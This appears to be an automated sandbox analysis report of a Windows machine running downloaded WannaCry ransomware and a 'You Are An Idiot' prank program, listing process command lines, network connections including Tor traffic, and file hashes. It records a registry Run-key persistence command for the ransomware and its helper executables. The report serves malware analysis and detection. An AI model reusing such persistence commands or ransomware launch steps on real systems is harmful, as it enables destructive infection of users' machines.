reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f
C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]"
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
taskdl.exe
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3af4855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49810 | tcp | |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| N/A | 127.0.0.1:49817 | tcp | |
| US | 8.8.8.8:53 | 5.161.26.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 36.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 142.250.180.17:443 | csp.withgoogle.com | tcp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 142.250.180.17:443 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.212.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | 216.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.180.17:443 | csp.withgoogle.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| N/A | 127.0.0.1:50607 | tcp | |
| N/A | 127.0.0.1:50620 | tcp | |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:52422 | tcp | |
| CH | 46.28.207.141:443 | tcp | |
| NL | 194.109.206.212:443 | tcp | |
| FR | 5.39.92.199:443 | tcp | |
| CZ | 46.28.110.244:443 | tcp | |
| SE | 171.25.193.9:80 | tcp | |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| FI | 91.158.28.49:8443 | tcp | |
| US | 8.8.8.8:53 | 49.28.158.91.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | ffbf91a9ec5ff23fe54e1469ce0fb653 |
| SHA1 | d578492fa3d08b4bf0caf9b37568c4e1b46803b9 |
| SHA256 | f7ff06084825eff5f887f5609aad84896729490a3f71e2a16c5869330a77f5dd |
| SHA512 | 31a5bd53fee54eec79c89b4ebfd350f43f0c4cdcc08f725898c4bd786760b75d8c2d47d583c92e6582caba7e6209c874ee3f4038967b92c3786684984c4a9599 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 0e807656bd86f2aef7ccf207f963973b |
| SHA1 | 27052af8d103d134369e356b793eb88ba873df55 |
| SHA256 | c509c498682bec50142782a51785655020bea27652f46e104e07a530c2ff5162 |
| SHA512 | e6c7d5e001e8322ccb1abd101d47e7f1401597518f45dd8da1d757728147262bcb3b1f96128f291e0e367c5b34026b401468e4219b27cf3c37a8d434180cd8f3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 9e7e8d97b3f25472801b4087cf9ecfb0 |
| SHA1 | 5a222006082fb7e098f58686b7e9d60141e7b5ac |
| SHA256 | e8dfa69269e62eed53d7bc965866c8aa140ea9f56e231e1d92002183db034969 |
| SHA512 | 6ef3382ba657c1c7dd4926e93e08d4c116b2aaa416b9cd668f0e2dbfd0e539010535f68977f5d9accef36d328e15df7eeabbec0d6c63b276d6638a36bcc50cfe |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\6e961a22-4af6-4ba8-b0a5-b310c9e0656d
| MD5 | 5ae928d5e53c155867fb61bf309b16d7 |
| SHA1 | b2ad3d322758e094299ed3df77d8b8d1a29ba28d |
| SHA256 | d36c32b2bea14c442c74224f6ed3c945d61e73acd740056875025536726dc94c |
| SHA512 | ddee60ce4e246a320fb5161962a3b86ede8f1ec18fb9a39d483091740604f4b1294d4f5ff7137c23ff4a63acd4e6a253db1e09ea8cf5764e9df05d42490ab006 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\9e0d0e94-9fbd-425d-9b0a-70e79f817266
| MD5 | 8b812d45c4353b5ecdd3950eb3e8d2ef |
| SHA1 | f5be8d72611cf5a64047a68fc302d2bc94204478 |
| SHA256 | a4f7ef5ddaabd39f595aad14486d3549f83fccf31ed8f094eb94d563fc0a3f39 |
| SHA512 | 3514f4f0f83b1799f205a3c8cae6cd69d6a780fa03a46edb9cc2defa79f967826b808a436d83d9d93d946f87fa89328100e735731fc99cc49a1e50b6b650a5d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 0d0013d9708d9fef539adc917f5b87f6 |
| SHA1 | 5e071e6b4d8abf007c8bb78ee948caf5bb0439e1 |
| SHA256 | f416d29cdbaa66b7d04483831d2a593a735316fafb643414a12df78da0ab054b |
| SHA512 | 851e9965a0fed9e0f5195ce655635cf13687d18678e4a9df807ab22cbc53c02cd2006fd65d93cd80b2a06d709e59122ea9933ba5cec551c6d51f5e9b4c175388 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js
| MD5 | 34775a999d72cffb22acbd0b7d98aaa6 |
| SHA1 | e5e83a61091871f97f70f5dfb7891f036b8d34e5 |
| SHA256 | 555efa41dce661287cf480f6f9ae611fd0c3b940cd9bdfc1225aa5ac957ffbf0 |
| SHA512 | b41c02e1eeb705a9cdd0dc7c13fe010795395f712c44120d7ea0db34e7e0442adf566551f22feaafb21d13d0c78a7204a00f8c85f74ccbb7aeda599ba6c6ce4e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | bc256cde673f64a47ec3da26429c74a8 |
| SHA1 | 167d9f6503c6f08138e5996fc98b3400c5009a5c |
| SHA256 | 1656502a8d5785adac9e95f6110b1cae3691b987b260957974a5f314e62ef85b |
| SHA512 | ee3ccf495a84f831f0d6d852b0c4cfe435edb353fff55e0128a56a4e083adf207d2372d7832cbbb71b58092dbf8188f6a1d99fc971bd4b8ca2d5d4d1904b6f1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4c13bb4bf31bec927d7b3e09d0926858 |
| SHA1 | 8248f46d5fceb13c480f76c79d9ca41deea95e96 |
| SHA256 | bef2e0fc0738c82e7ca5563e88d5e666ebe10a7730287751efebef4d88a9df93 |
| SHA512 | f1cba3da37740ac4c1f9de58ee29bb2bf19b0ba54ac51553b2fc3fc001cc5163727a34df45e52535af7111f9b7d96d496eb862063ffd4a66c03d5aa7fdec6178 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js
| MD5 | 59c7efb9be731093557a79f43096f4ef |
| SHA1 | a88503c1679501ebf33ff3b09c690622566ed72d |
| SHA256 | 7433ede2934df0b7790fe4a027ea87b5555536474f00de665e3cba9c94cd1f2a |
| SHA512 | 0276a555928bf47408b045f28adf10fbfa80aecb4e2f41a4fca7ebe116ae5d2e19c7862298b6ca548e2de3c076ea0424e4b171f3150bfc4ecceafbde1148fa63 |
C:\Users\Admin\Downloads\You-Are-An-Idiot-main.j4SoN6dR.zip.part
| MD5 | 7cae6b379184f1cc5444ca2fc9a8ec75 |
| SHA1 | 9a68fb4fed6c6f633275480ac481b7d24a1e60ad |
| SHA256 | 4b6edb96987da0a7714e705a7af8516ee7167c8a616eff6eb3ed9e54f6d02ee1 |
| SHA512 | fc81537d3fa0aa4fdc56ebcbc13bc43167cf1cd5424077c65292d7c86dd1e7aa11c44a5c78d8ca6fb31d942c034c1a9ee309aa8ee8a75a39dea0d3ed65790604 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a44bac652141a6dbfddb7b3a1fd7e89c |
| SHA1 | bda3bb835391b0e1c197c8ab2ebe27df97e0cf8d |
| SHA256 | 4e532dd03c9c719436be85cdb8aa1653405f861c1e83c7b4556cd1cb2dff7d8b |
| SHA512 | 432d529401b4d192d241124a79fc1b57b5e7669fc895cbd00143334c61d233b8431adbe86a6a4f39c3b92b6098319efdca3d756f1e393b0d60e25d7106491542 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6d4114073fb273fa337a3a3b14b61dae |
| SHA1 | f0f44d3af70d3c8c551d601074642e031d001e91 |
| SHA256 | b9e585217d7b7f8a1db3f509ab45ac7bc0981b9824259ae728e21e3af8c26b62 |
| SHA512 | 35fc4c8ddb8fc5b1f5d862724051159d6d8746a50f9421d563f776c57f585356869c7277ee746a23365e046af476b720f8ff8464952886877bc59457d6467ca7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 5616d5350be686ddee3d57b2e3ac20cd |
| SHA1 | b7355dbeb1756a11b15cd81e21a5c625cdad50ab |
| SHA256 | c13b5f108ed0f2460206c76968b8b7c01b4712a56d9f3341c68a1e037228aa49 |
| SHA512 | 854b45c434c9c1747f075b045498da1bd03f2494e506a52015c65cf8bcaa28e54d8a5df000bbfa7a86a51f62e84f9e6c2dd179c6b2c854806899f28745cd9263 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 96f35db267072549b2b076e73ec8ba21 |
| SHA1 | e1a122a862cd421cda6d92d771fd558691b7b28d |
| SHA256 | 2720a17738533021877ee3006cf61e879c060bcdcbd62c575b2c0aca0141fa60 |
| SHA512 | 3629c2b2615ca0b3ec83409b91b20b1965cfcfe4a9cf92bbaa5878dbbee0ff28928a11fa9172979ad586b5ceb823bb422cd71d92eb20cbef7be6445789fb3369 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\79679B23E6BBEB689E1C79E27C32C20C5EC9DF47
| MD5 | 7382ec99f3cdda1d01d29e34ee6197ce |
| SHA1 | 0b41b3c41f1a251c35e8ea4d91e9ce48da9717f7 |
| SHA256 | b9abd60671e293430670344041e90806fa26504c91a3cb5c34a756c7d38ca318 |
| SHA512 | aade0d0fd69c2cc1c3a67116e0f84b3308ad68d3207a20b853d192af82042954e958d35fabf4f90cf0664ea1c4c1f9805d1bb1510a4d578725f58ecd8498e61c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 08759a0a85eaac39b9a7f2bf57090fa8 |
| SHA1 | ba0d658af52d19aeb087f71a2520f8e21f99d9e1 |
| SHA256 | 642fd7bff09048403f360beb88c68b3e831c50e72e0a857b9e7a3f607345416e |
| SHA512 | 71bcc4e46e77c65a58fb4d860ae703235bc42392fb3c5f332f2470bd5c74c639b5d1afdcb31ddc25e578acdd2eea2c47d9cc39db22879c747319ab16857a6bf4 |
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.UDZVBJBP.0-master.zip.part
| MD5 | 017f199a7a5f1e090e10bbd3e9c885ca |
| SHA1 | 4e545b77d1be2445b2f0163ab2d6f2f01ec4ca05 |
| SHA256 | 761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f |
| SHA512 | 76215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4
| MD5 | 8c49ac112830cea49fbc36e87f2e7a64 |
| SHA1 | 5d765c172eceb3b72359cf43a875e7df0377f3f9 |
| SHA256 | c331d3888bb6263a9076a19d7e81d09e0408ead4ac082c363d6f0524176cfae8 |
| SHA512 | f74b89685ef12fc70b7e42106d69a001d39dd0b26ceda9cacf1e0c43651013be82451a3f072b70e1e7bc3a3e8b6012ce4e5137e4428a5aba54bb6df979a20741 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js
| MD5 | 80ea913f0ea5b5366fb75c482b310e74 |
| SHA1 | 633651f54076bb8699574a65323da3969bdac9df |
| SHA256 | 7ced13a228c3109d8ca8ef4f84e23802939d14566eacd05f1c0593f8e43e6cb5 |
| SHA512 | 1834c7d78aab468b77f13bbce9d0abdadc98335d3dd99ed9507acb669124149f215ff874132c864a7de53cac4445649e4f23ba3f1157bc16ae04aaa93d0acaa6 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\urlCache.bin
| MD5 | 1545a3e921a3098b76cf6cadccc4ae35 |
| SHA1 | 1d67d3f30d70cc8f630fa7efc31bc55e54e56665 |
| SHA256 | 19984a956bb9091780a609c5bfea2a29c9dcee058ca32ae715392eef6debc027 |
| SHA512 | fa364733cf0fa48126ae3b37cafc72b19bc7b8506cedf94f77fff3883de620b5f3402933a1cbbb26abc0ca18651000db882bc4b2c21417bda9c14c4929811ce8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json
| MD5 | 58e240288763218d12bf235d34e5aee2 |
| SHA1 | 89135494b57f590011c09668dec3b90d2c5ee9ae |
| SHA256 | 615f80e71dfde24711e7fefc1b7959f7592c5e5cf9ad0f3aecb4235b93187176 |
| SHA512 | caed2638902987aead199e73cffb90881bf245bbb616cb38c46b281d4aaaa54dc20a54e9bfe17a8d6e68847394c113fb7606e94b64f44ab0b52bf7846f26e936 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\scriptCache.bin
| MD5 | 81dbbb72f05c9543ae965e281f7e49bc |
| SHA1 | 14c37d4bcbae9f3b93b84ed716ee265766511b16 |
| SHA256 | d0f18173bc0f13c6c3e8c469f66976acd7679bd18f37ed01373731750ec662f9 |
| SHA512 | 5bf8d307e29074afb24b43b08cba0ffd2f34b06bd284e0d901a827aedb7d48f9fd5bd0bd9b68453a5bba74b97f0c79d9a0b10143de244706771ea74345113f52 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\permissions.sqlite
| MD5 | 2a0d67d2080630ecee86fd48bb94e883 |
| SHA1 | 39c15e5f612a901ef40c5ba09968ca82ba50da60 |
| SHA256 | ce9069eb3b1636c59ea16404fcf06789b722fc3c3c87205fd099839a3e1c6fdf |
| SHA512 | 0f8f546591e236e9a563ecc83f6ea6127d7926ba1e71d7b75e51c7f657db3e1b6c2d9190039a1994532866d060af5dac1502e9bc0d7c56dd41554488005f2b81 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cookies.sqlite
| MD5 | 4283cd67162d87d0983c4c9860b39fc8 |
| SHA1 | 8602315b7625f8de99c2ca228393c050c2987799 |
| SHA256 | 9f0c8accedfea2f72a35f16a72af6fecdabd729adae04bb2e1c78f268240e446 |
| SHA512 | 773a42b2e1c4e710cce0bbce7f531e6c146c605f35ec49c019796a30cb7c69c3eced5e6ffb651f4eb841f690d692330381c4637e3fe5585127400ae113eca9e0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json
| MD5 | 362985746d24dbb2b166089f30cd1bb7 |
| SHA1 | 6520fc33381879a120165ede6a0f8aadf9013d3b |
| SHA256 | b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e |
| SHA512 | 0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage.sqlite
| MD5 | 42a8ac62d6df0caa5db397589bbdceff |
| SHA1 | 29eaeba053a73d1f2d74ae76ede8e5d1293451ee |
| SHA256 | 543323ca552b9ddde17bb9c3c1f6d1bb2734543ad54df1ce1b48d2357a46806a |
| SHA512 | 49e778f718727f8dfd5fb2e263f7f7904bc53a9656258d8b08c8bb953e4423f5f55fca8b3831784757f707b1fc996be83bef4874d298327a2551dd438bad79d6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\SiteSecurityServiceState.txt
| MD5 | 172feb55c117f905f3f3e3e1e0109b8c |
| SHA1 | cb2363d405510f5bbdb08ce28b39728b0bf0379b |
| SHA256 | 85c0dfdcad23dff3a057682fec8f914a85f458780de0d7a061e9d59314c0fb03 |
| SHA512 | a9c02350a89b0be7ed1b2cf442f6fd3301b7284e7062b70173b666698dcae53f0d330563751de77cd4dcf59042fb2eac85d4378e451591520ca04f91b1b4f00e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cert9.db
| MD5 | 998b29d9a959c132009411868a19f906 |
